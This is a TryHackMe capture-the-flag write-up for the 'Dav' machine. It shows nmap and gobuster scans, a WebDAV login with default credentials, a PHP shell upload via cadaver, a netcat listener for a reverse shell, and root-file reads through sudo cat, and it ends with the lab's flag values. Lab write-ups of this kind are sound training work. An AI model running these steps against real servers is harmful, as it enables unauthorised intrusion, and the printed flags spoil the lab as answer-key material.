TryHackMe - Dav Writeup

You can find the machine there > Dav

As always let’s start with a nmap scan.

1
2
3
4
5
6
7
8
9
10
$ ip=10.10.242.239
$ nmap -sC -sV -oN initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 16:54 EEST
Nmap scan report for 10.10.242.239 (10.10.242.239)
Host is up (0.17s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

When we visit the webpage we can see the Apache2 default page, let’s run gobuster.

1
2
$ gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.txt
/webdav (Status: 401)

When we visit /webdav asks for credentials :

WebDAV (Web Distributed Authoring and Versioning) allows users to update, upload, delete, move, copy files.

I searched for default credentials and i found :

1
2
user: wampp
pass: xampp

And we’re in, now we can use cadaver (webdav client), to upload a shell.

1
2
3
4
5
6
7
8
$ cadaver http://$ip/webdav
Authentication required for webdav on server `10.10.67.29':
Username: wampp
Password: 
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 5492 bytes succeeded.
dav:/webdav/> 

Now we can execute it and take shell.

1
2
3
4
$ nc -lvp 6666
listening on [any] 6666 ...
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ 

Now privesc is silly, we can run cat as root :

1
2
3
4
5
6
7
www-data@ubuntu:/$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat

So let’s read the flags.

1
2
3
4
5
6
www-data@ubuntu:/home/merlin$ cat user.txt
cat user.txt
449b40fe93f78a938523b7e4dcd66d2a
www-data@ubuntu:/home/merlin$ sudo cat /root/root.txt
sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5

See you!